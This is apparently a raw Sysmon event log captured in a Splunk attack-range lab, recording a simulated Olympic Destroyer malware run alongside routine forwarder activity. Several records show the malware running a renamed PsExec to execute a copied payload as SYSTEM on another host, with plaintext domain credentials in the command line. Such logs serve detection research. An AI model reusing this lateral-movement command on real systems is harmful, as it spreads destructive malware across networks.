11:12:58.796{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000296763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:58.280{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E067E659D31CCE44BB26B2062D25B1D,SHA256=D828AAC884C0D73247CDAFB3A3C2D7979EF9D2553320317A8620DA384074C81C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:59.295{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E69721574A3510BDFDAD05F817A0B9,SHA256=BF3AC4259A17270B1C8B1F64D2059D95B0D69219176CD257197F5FE801346A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:00.311{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65668428FFADE32D834DC20EA7D592A5,SHA256=01AC55F3DF54EC03B27C09E02E43F436AE485359C77E97A0449AC8F5224B2865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:00.026{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D286D928B86EFEEF87199C09D24038,SHA256=4A5E987C4FB5B028D6317336C1EF2A259533410ABA65A60CF8883E59385045A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:58.092{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgm 354300x8000000000000000296768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:58.091{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x8000000000000000296767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:57.733{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49382-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000296785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.942{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.842{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.826{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.834{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.826{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.826{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000296779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.595{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16BD-6216-0907-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-16BD-6216-0907-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.579{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16BD-6216-0907-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.581{C8EA50B7-16BD-6216-0907-000000003802}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.326{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21139D84D66E261CBFDEABF4729ABCD,SHA256=7AF34F1857A5C76D0CE86F4D420C0F7AB51CF737946E4601A7646D4652F2A7C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:59.664{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51603-false10.0.1.12-8000- 23542300x8000000000000000220761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:01.042{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93B34EEE21E8986DF6451A59B680FB93,SHA256=9DA59854390DB7256CF3ECC80D4562CE499AC96A5764E1EA9D424E50A5454EF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.882{C8EA50B7-16BE-6216-0C07-000000003802}5924196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:02.089{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA63897A1647FB07A12CBB2A60DAA267,SHA256=588D3F32E8A5CDD0C008E27AE21D7337B5ED18703F522E971528BA7873D0FC7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.290{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16BE-6216-0C07-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.290{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.290{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-16BE-6216-0C07-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 